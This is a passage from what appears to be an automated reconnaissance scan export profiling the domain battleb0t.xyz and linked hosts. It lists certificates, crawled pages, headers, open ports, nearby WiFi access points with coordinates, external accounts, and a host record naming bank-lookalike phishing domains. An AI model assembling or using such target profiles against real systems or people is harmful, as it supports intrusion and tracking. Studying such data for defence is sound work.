TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1F:80:B0:A7:B9:49:16:0F:27:7B:7C:B9:F5:38:B5:3D:C9:3C:2F:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:24:21 | Web Content | No | Web Spider | 2 | 0 | 3 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c59d97743e3')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '89417',
cRay: '7c5f8c59d97743e3',
cHash: 'd514be865123f26',
cUPMDTk: "\/lol.html?__cf_chl_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MTg2MS40MTQwMDA=',
m: 'cETLdgv65AVfRnLUKPe0Cd6r3wJgEhjfW5wAN2YKd/o=',
i1: 'w+O5Ul3LVrlFQJyL4ELS5Q==',
i2: 'eUom9RfWfCbkQbM7K2vx8A==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c59d97743e3');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c59d97743e3';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GOAT (Net ID: 00:00:C5:D3:87:1C) | 37.7813933,-122.3918002 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 104.21.71.14 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:80 | 87.248.157.102 |
| 2023-05-12 03:09:51 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 4 | 0 | None | keyubu.com | dgn.keyubu.com |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CableWiFi (Net ID: 00:0D:67:33:68:61) | 39.0469, -77.4903 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Google Trust Services LLC,CN=GTS CA 1P5 | battleb0t.xyz |
| 2023-05-12 02:46:50 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.74.170.74 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/carti_2.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | PLXDevices (Net ID: 00:06:66:30:03:AC) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:02:57 | Web Analytics ID | No | Web Analytics Extractor | 0 | 0 | 3 | 0 | None | Google Analytics: UA-105392568-1 | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
.promo {
display: none;
/* display: table; */
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 1;
overflow: auto;
color: lightblue;
background-color: rgba(0,0,0,0.4);
animation: promo-appear-animation 0.35s ease-out;
}
.promo-middle {
display: table-cell;
vertical-align: middle;
}
.promo-content {
width: 80vw;
height: 80vh;
max-width: 80vh;
max-height: 80vw;
margin: auto;
padding: 0;
font-size: 2.8vmax;
font-family: Futura, "Trebuchet MS", Arial, sans-serif;
text-align: center;
background-image: url("promo_back.png");
background-position: center;
background-repeat: no-repeat;
background-size: cover;
border-radius: 15px;
box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);
}
.promo-header {
height: 10%;
padding: 2px 16px;
}
.promo-close {
width: 10%;
height: 100%;
text-align: left;
float: left;
font-size: 1.3em;
/* transition: 0.2s; */
}
.promo-close:hover {
/* transform: scale(1.25); */
cursor: pointer;
}
.promo-body {
padding: 8px 16px 16px 16px;
margin: auto;
}
.promo-body p {
margin-top: 0;
mix-blend-mode: color-dodge;
}
.link {
width: 100%;
display: inline-block;
}
.link img {
width: 100%;
}
@keyframes promo-appear-animation {
0% {
transform: scale(2.0);
opacity: 0;
}
100% {
transform: scale(1.0);
opacity: 1;
}
}
</style>
<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-105392568-1', 'auto');
ga('send', 'pageview');
</script>
<script async src="https://www.google-analytics.com/analytics.js"></script>
</head>
<body>
<canvas></canvas>
<!-- Mother of God, pls forgive me -->
<div class="promo">
<div class="promo-middle">
<div class="promo-content">
<div class="promo-header">
<span class="promo-close">×</span>
</div>
<div class="promo-body">
<p>Try Fluid Simulation app!</p>
<div class="links-container">
<a class="link" id="apple_link" target="_blank">
<img class="link-img" alt="Download on the App Store" src="app_badge.png"/>
</a>
<a class="link" id="google_link" target="_blank">
<img class="link-img" alt="Get it on Google Play" src="gp_badge.png"/>
</a>
</div>
</div>
</div>
</div>
</div>
<script src="./script.js"></script>
</body>
</html> |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:41:40:58) | 39.0469, -77.4903 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 4 | 0 | None | English | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>vscode.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:21 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">vscode.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f606679610ce9</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:23:50 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.20:443 | 188.114.96.0/24 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.79): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 03:43:29 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Netherlands | Eygelshoven, Limburg, 6471, Netherlands, Europe |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | y?maz mef. (Net ID: 00:12:BF:D2:A8:62) | 40.2024, 29.0398 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007sair.github.io | 185.199.111.153 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:37:68:7b:1f:26:29:cd:a4:cc:95:52:df:e2:0a:12:6f:13
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 13 15:23:51 2023 GMT
Not After : May 14 15:23:50 2023 GMT
Subject: CN=nuke.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D9:CF:28:31:E6:B0:52:A6:B3:E5:82:F1:AF:FD:4B:16:99:CF:87:98
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nuke.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 13 16:23:51.711 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 13 16:23:51.724 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:55:15 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
Date: <REDACTED>
Set-Cookie: XSRF-TOKEN=eyJpdiI6IkpHMTdmeTU3ZDYwZnVJOEZ6K1lCMmc9PSIsInZhbHVlIjoiMXA0Z1VsZWxwK2dDVkY4Sk1IWVdXKzNzaU8zM1VPcytNUE9HZEtmVkpmY0tRQ3BMczIyMjR4ZU9VWFdDRTRVNG94cU5KbXFkdnA3L3dVdEo3cy9YYTgvOWdtdHpISktCOWlOa0UrWG1LZWtPL1lVWHFsOEhhRjFaZ3dYZDZiU2siLCJtYWMiOiJiYzUwNmFjZjdkMzVlMzczZWI5YTJmMzM4NWFhOGYwYTA0Y2VkNmJlZWI5YmZhODViNDMwMjNjYTY5NjI1NWIyIiwidGFnIjoiIn0%3D; expires=Thu, 11 May 2023 19:34:47 GMT; Max-Age=7200; path=/; samesite=lax
Set-Cookie: laravel_session=eyJpdiI6ImdUVzFCME5hTHdVNjIvVHBRWjNUU2c9PSIsInZhbHVlIjoiaThZSTFKV29BNjc2ekZNZVRHdkNXTXJvVlVOZCtNemFRSlo4RFlXZ0lZR1pyV1FwMmp4K2ZmLzdmUEtBM0JTTjNTQmhnNG9uVlhabFJkUklRRkhVZmkrbVlnb1BZelR2K1VLNUkxdUhQL1d6bFBpSFk0QUJ4TzNDcjA5ZktLcjYiLCJtYWMiOiIxNzk1Nzg4OTNkYWJhNjk4NzRmM2E4Njc4ZDY3ZWE2M2Y2YzQxZTIxMTZjODQ2OTZiMDdmNWE1OGJjY2YyNzc0IiwidGFnIjoiIn0%3D; expires=Thu, 11 May 2023 19:34:47 GMT; Max-Age=7200; path=/; httponly; samesite=lax
Content-Encoding: gzip
| 165.232.113.85 |
| 2023-05-12 02:54:07 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | tumblr (Category: images)
https://ayshoo.tumblr.com | ayshoo |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Coderwall (Category: coding)
https://coderwall.com/login/ | login |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-512-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", 
"mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], 
"server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, 